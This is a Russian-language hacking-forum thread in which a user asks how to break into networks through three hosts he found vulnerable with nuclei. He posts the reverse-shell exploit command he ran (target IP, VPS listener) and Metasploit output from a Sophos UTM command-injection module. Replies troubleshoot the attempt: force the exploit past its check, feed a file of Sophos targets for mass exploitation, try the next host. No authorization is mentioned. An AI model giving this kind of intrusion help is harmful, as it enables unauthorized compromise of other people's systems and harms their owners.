• XSS.stack #1 – первый литературный журнал от юзеров форума

Помогите попасть в сеть

ProgrammerMan

RAID-массив
Пользователь
Регистрация
15.05.2022
Сообщения
79
Реакции
5
Депозит
0.00
Имею 3 уязвимых хоста но не могу попасть в сеть
CVE-2020-25506, optilink-ont1gew-gpon-rce (вроде с fortinet связано), CVE-2020-25223.
Пытался попасть в сеть с помощью метасплоит,нету результата,что подскажите делать?
Таргетов нашёл с nuclei мб nuclei не правильно показывает таргет уязвимый или нет?
 
нету результата,что подскажите делать?
А, что метасплоит пишет? Другие скрипты пробовал? Как помочь, если если ты ничего не рассказал о проблеме?
 
Минуту, сейчас включу свои телепатические способности и подскажу почему у тебя что-то не сработало без ошибок, команд и вообще какой-то конкретики
 
Пробовал с Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)
python3 index.py -t 1x.xxx.xxx.xxx -l 7x.xxx.xxx.xxx -lp 4444
-t таргет ип, -l локальный ип(поставил ип впски) -lp порт,
ошибка Max retries exceeded with url
 
Минуту, сейчас включу свои телепатические способности и подскажу почему у тебя что-то не сработало без ошибок, команд и вообще какой-то конкретики
CVE-2020-25223
Started reverse SSL handler on 7x.xxx.xxx.xxx:443
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
сам эксплоит linux/http/sophos_utm_webadmin_sid_cmd_injection
lhost опять таки поставил айпишник сервака
lport 443
srvhost по дефолту 0.0.0.0
srvport по дефолту 8080
rhost айпи таргета поставил
rport 4444 по дефолту
 
А, что метасплоит пишет? Другие скрипты пробовал? Как помочь, если если ты ничего не рассказал о проблеме?
Написал,можешь посмотреть в теме.
 
unknown: Cannot reliably check exploitability. "set ForceExploit true" to
Тут пишет, что не может проверить на уязвимость. ForceExploit ставил true?

Если всё равное такое пишет, то скорее всего хост неуязвимый к этой cve.
 
ошибка Max retries exceeded with url
Ну недоступен хост, из описания могу предположить что реверс шелл он почему-то сможет прокинуть только на локальный айпи:
parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True)
parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!")

[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. "set ForceExploit true" to override check result.
Ну попробуй это выстави
Если нет, пробуй следующий хост
Выстави там в rhost просто file:/path/to/sophos_list.txt и запусти
Таргетов нашёл с nuclei мб nuclei не правильно показывает таргет уязвимый или нет?
Может.А может и нет.что-то не сработало на удаленном хосте к которому нет доступа.
Тут только гадать можно
У меня нету ни роутера, ни твоего темлейта, ни желания тыкать и выявлять потенциальные фолсы этого темплейта для какого-то домашнего роутера, сори
 
Последнее редактирование:
если нуклей нашел, вообще не факт, что там есть что то, он же просто версию узнает и смотрит по базе, есть ли в такой версии уязвимости. если не прав, поправьте плиз
 
если нуклей нашел, вообще не факт, что там есть что то, он же просто версию узнает и смотрит по базе, есть ли в такой версии уязвимости. если не прав, поправьте плиз
На гитхабе написано, что использует отправку запросов на таргет используя их шаблоны
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх